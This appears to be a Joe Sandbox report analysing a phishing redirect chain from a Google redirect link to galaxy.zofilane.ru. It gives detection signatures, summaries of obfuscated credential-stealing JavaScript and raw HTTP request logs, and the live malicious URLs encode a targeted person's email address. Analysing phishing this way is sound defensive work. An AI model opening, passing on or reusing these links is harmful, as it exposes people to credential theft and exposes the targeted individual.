Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==

Overview

General Information

Sample URL:https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR
Analysis ID:1575062
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected BlockedWebSite
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Detected suspicious crossdomain redirect

Classification

  • System is w10x64
  • chrome.exe (PID: 2228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2356,i,11036611443396559380,4828039607253252952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
    1.1.pages.csvJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==Avira URL Cloud: Label: malware
      Source: https://3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru/iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCPAvira URL Cloud: Label: malware
      Source: https://galaxy.zofilane.ru/cdn-cgi/styles/cf.errors.cssAvira URL Cloud: Label: phishing
      Source: https://galaxy.zofilane.ru/favicon.icoAvira URL Cloud: Label: phishing
      Source: https://galaxy.zofilane.ru/cdn-cgi/images/icon-exclamation.png?1376755637Avira URL Cloud: Label: phishing

      Phishing

      barindex
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: Yara matchFile source: 1.1.pages.csv, type: HTML
      Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://galaxy.zofilane.ru/pD0JM2s/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a suspicious domain upon certain conditions. These behaviors are highly indicative of malicious intent, such as phishing or credential theft.
      Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://galaxy.zofilane.ru/pD0JM2s/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The combination of these behaviors suggests a high likelihood of malicious intent, potentially to prevent analysis or hide other malicious activities.
      Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://galaxy.zofilane.ru/pD0JM2s/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
      Source: http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==HTTP Parser: (function(_0x2d3681,_0x3ca098){const _0x19217e=_0x2d3681();function _0x47ada0(_0x59de39,_0x4c572a,
      Source: http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==HTTP Parser: (function(_0x2d3681,_0x3ca098){const _0x19217e=_0x2d3681();function _0x47ada0(_0x59de39,_0x4c572a,
      Source: https://galaxy.zofilane.ru/pD0JM2s/#Makansha.kanodia@ltimindtree.comHTTP Parser: No favicon
      Source: https://galaxy.zofilane.ru/pD0JM2s/#Makansha.kanodia@ltimindtree.comHTTP Parser: No favicon
      Source: https://galaxy.zofilane.ru/pD0JM2s/HTTP Parser: No favicon
      Source: https://galaxy.zofilane.ru/pD0JM2s/HTTP Parser: No favicon
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.ao to http://primer-distrito-amvt.org/.r/7t2aae-suredannywthbnnoys5ryw5vzglhqgx0aw1pbmr0cmvllmnvbq==
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: onedrive.live.com to https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ== HTTP/1.1Host: www.google.co.aoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /amp/primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ== HTTP/1.1Host: www.google.co.aoConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=YPTv00oaEXJ-8pjl7-taO5riXVgPDxLiRcxboeE70imylGMRLzFxif5b-4t_pEBmtCGdKz3iUSMarXkMFQ3Ibr7warnVyrJJqONE1AyWNG0xaUi1ZmQQLRrFPjrwgiK4SMokmN7BUiLSrLX9qUoOBYSSBABIIKtHwBuo8SFXDgFgfnl3B-EaVcIdch9htRt6Rzsr
      Source: global trafficHTTP traffic detected: GET /pD0JM2s/ HTTP/1.1Host: galaxy.zofilane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://primer-distrito-amvt.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Host: galaxy.zofilane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://galaxy.zofilane.ru/pD0JM2s/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Host: galaxy.zofilane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://galaxy.zofilane.ru/cdn-cgi/styles/cf.errors.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: galaxy.zofilane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://galaxy.zofilane.ru/pD0JM2s/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Host: galaxy.zofilane.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/phish-bypass?atok=SwbvVwxKw1smiZvPhiPMY4WOqvwCFExpxKNssjOvcsQ-1734167414-0.0.1.1-%2FpD0JM2s%2F HTTP/1.1Host: galaxy.zofilane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://galaxy.zofilane.ru/pD0JM2s/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pD0JM2s/ HTTP/1.1Host: galaxy.zofilane.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galaxy.zofilane.ru/pD0JM2s/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_mw_byp=SwbvVwxKw1smiZvPhiPMY4WOqvwCFExpxKNssjOvcsQ-1734167414-0.0.1.1-/pD0JM2s/
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://galaxy.zofilane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://galaxy.zofilane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://galaxy.zofilane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://galaxy.zofilane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://galaxy.zofilane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f1d10088a7d4314&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f1d10088a7d4314&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8f1d10088a7d4314/1734167450210/38132fcd19d973b837eaa64685b9bff3165b028fbc00b715dad7a1e69f88cde0/YfI4Pgqs8xMmOW1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8f1d10088a7d4314/1734167450211/C0KkzdsRP1tlIpN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8f1d10088a7d4314/1734167450211/C0KkzdsRP1tlIpN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
